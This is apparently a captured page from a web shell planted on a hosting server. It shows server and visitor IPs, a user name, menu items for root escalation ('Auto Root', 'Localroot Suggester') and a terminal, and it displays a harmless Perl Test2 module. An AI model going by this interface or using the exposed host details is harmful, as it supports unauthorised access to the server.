Linux ams-business-5.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 23.254.231.17 & Your IP : 216.73.217.37
Domains :
Cant Read [ /etc/named.conf ]
User : uxvsuhne
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
share /
perl5 /
Test2 /
API /
InterceptResult /
Delete
Unzip
Name
Size
Permission
Date
Action
Event.pm
27.97
KB
-r--r--r--
2020-10-22 03:10
Facet.pm
380
B
-r--r--r--
2020-10-22 03:10
Hub.pm
967
B
-r--r--r--
2020-10-22 03:10
Squasher.pm
3.59
KB
-r--r--r--
2020-10-22 03:10
Save
Rename
package Test2::API::InterceptResult::Facet; use strict; use warnings; our $VERSION = '1.302183'; BEGIN { require Test2::EventFacet; our @ISA = ('Test2::EventFacet'); } our $AUTOLOAD; sub AUTOLOAD { my $self = shift; my $name = $AUTOLOAD; $name =~ s/^.*:://g; return undef unless exists $self->{$name}; return $self->{$name}; } sub DESTROY {} 1;